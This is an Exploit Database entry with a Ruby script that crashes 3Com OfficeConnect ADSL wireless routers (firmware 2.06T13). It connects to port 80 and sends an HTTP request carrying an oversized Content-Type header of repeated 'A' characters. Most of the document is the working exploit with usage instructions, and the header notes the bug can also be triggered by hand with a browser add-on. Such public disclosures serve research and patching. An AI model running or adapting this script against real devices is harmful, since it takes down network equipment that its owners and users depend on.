3Com OfficeConnect Routers - 'Content-Type' Denial of Service

EDB-ID:

10580

CVE:

N/A




Platform:

Hardware

Date:

2009-12-21


###############
# Model -> Tested on 3Com OfficeConnect ADSL Wireless 11g Firewall Router 3CRWDR100A-72 and 3CRWDR100Y-72
# Software Version -> Tested on 2.06T13 (Apr 2007, last version for these routers)
# Attacker -> Tested from GNU/Linux (Sidux and Ubuntu) and Windows 7
#
# Exploit languaje -> Ruby
# Type -> Remote Denial of Service Exploit by HTTP
#
# Additional info:
# - The bug can be exploited with Tamper Data (Firefox Addon) too, LOL.
#
###############
# Discovered and written by Alberto Ortega
# http://pentbox.net/
###############

require "socket"

host = ARGV[0]
buffer = "A"
send = ""

puts ""
if !host
	puts " 3Com OfficeConnect ADSL Wireless 11g Firewall Router"
	puts " Remote DoS Exploit by HTTP"
	puts " ------ Usage ---------------------------------------"
	puts " ruby 3com_dosexploit.rb host"
	puts " Ex: ruby 3com_dosexploit.rb 192.168.1.1"
else
	begin
		socket = TCPSocket.new(host, 80)
		puts "- Exploiting ..."
		# 8.times is enough to DoS
		9.times do
			buffer = "#{buffer}#{buffer}"
		end
		# Here are the HTTP packet, Content-Type value causes the DoS
		send = "GET / HTTP/1.1\r\nContent-Type:#{buffer}\r\n"
		socket.write(send)
		puts "- Successfully! :)"
	rescue
		puts "Connection problem"
	end
end
puts ""